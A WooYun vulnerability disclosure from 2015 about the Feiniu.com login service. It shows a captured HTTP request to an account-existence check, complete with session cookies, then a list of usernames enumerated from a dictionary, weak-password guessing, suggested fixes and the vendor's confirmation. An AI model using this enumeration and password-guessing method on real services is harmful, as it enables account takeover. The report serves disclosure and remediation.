乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
恩
http://sjmember.feiniu.com/static/html/login.html输入用户名自动判断是否存在,抓个包
POST /service/call.do?callback=jQuery1720026086857076734304_1446970915778 HTTP/1.1Host: sjmember.feiniu.comContent-Length: 129Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01Origin: http://sjmember.feiniu.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://sjmember.feiniu.com/static/html/wjml.html?backUrl=http%3A%2F%2Fzhaoshang.feiniu.com%2FapplyCompanyInfo%2Fapply.doAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: cart_token=0d35c93d46cf9f5a206bb5aae5f52f45_1446970157; guid=ZOy40cdO-ogR7-4G7l-89LB-eh72rLsHVDgL; first_login_time=1446970158429; _jzqx=1.1446970159.1446970159.1.jzqsr=wooyun%2Eorg|jzqct=/corps/page/33.-; _jzqckmp=1; _jzqy=1.1446970218.1446970218.1.jzqsr=baidu.-; uitox_shop=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2239d4b44810a7568bc40299f2d9bb1a08%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2210.201.128.250%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F45.0.2454.85+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1446970450%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D2b7ad4eb543ce59af9c547feb60e391b; access=3; ref=ref_https://www.baidu.com; C_dist=CPG6_CS000021; C_dist_area=CS000021_150400_150428_1504280005; _gat_UA-46390714-1=1; _ga=GA1.2.1484248303.1446970159; _jzqa=1.923256954181115300.1446970159.1446970159.1446970159.1; _jzqc=1; __xsptplus116=116.3.1446970453.1446970846.2%232%7Cwww.baidu.com%7C%7C%7C%7C%23%234FXsWj22qDz-3dE_y7P4JH1Q7X44Z1As%23; _jzqb=1.5.10.1446970159.1; b1e5e89ac7114e55=C10443A82E26E7624FD93A540626146C; csrf_cookie_uitox_member=d2e62ccd8b1596c48d27874e661c4c2e; 21dbedcc38ba9dce=aHR0cHMlM0ElMkYlMkZtZW1iZXIuZmVpbml1LmNvbSUyRmdldGF3YXklMkZsb2dpbkJhbm5lciUzRmNhbGxiYWNrJTNEalF1ZXJ5MTkxMDU1MTQyMjI2MDQ2ODgyNTdfMTQ0Njk3MDg5Mzk1MCUyNl8lM0QxNDQ2OTcwODkzOTUx; TS015ed114=01cfbf1eb56b07aec7026ec99117ea31800abfb6ab6ce610580f47e6c778a54ee60c53d2da5d3ae77b415b47dc1b1844395b31a63df409457ef27e980f6f84ed0a4aa447e096c94955dacff5fdc91ba90ded031619; Hm_lvt_7f78a821324600a0f059acdb24cf0937=1446970159,1446970218,1446970452; Hm_lpvt_7f78a821324600a0f059acdb24cf0937=1446970907; CLIENT_ID=14469709121968960115935Connection: closeversion=1.0&method=feiniu.member.isExistAccount¶ms=%7B%22userName%22%3A%22用户名%22%2C%22loginNameType%22%3A%22username%22%7D
找份用户名字典跑一下
1 zhangwei 200 false false 261 19 wanglei 200 false false 261 26 zhangjie 200 false false 261 27 zhanglei 200 false false 261 141 wangjian 200 false false 261 184 zhangkai 200 false false 261 235 chenliang 200 false false 261 255 wangjian 200 false false 261 261 zhangjie 200 false false 261 309 zhangjianguo 200 false false 261 320 zhanglei 200 false false 261 390 lixiang 200 false false 261 276 chenchen 200 false false 261 445 wanglei 200 false false 261 658 MANAGER 200 false false 261 3361 elaine 200 false false 261 4860 jackie 200 false false 261 5275 justin 200 false false 261 6054 louise 200 false false 261 8246 sherry 200 false false 261 8715 tiffany 200 false false 261 9325 yvette 200 false false 261
拼音部分是用户名再fuzz下弱口令,出来了一些
1、登录地方验证码2、限制登录密码错误次数3、弱口令强制修改密码
危害等级:中
漏洞Rank:8
确认时间:2015-11-09 12:24
安全部门已经提交过给开发了,在开发测试中,还是被发现了,多谢:)
暂无
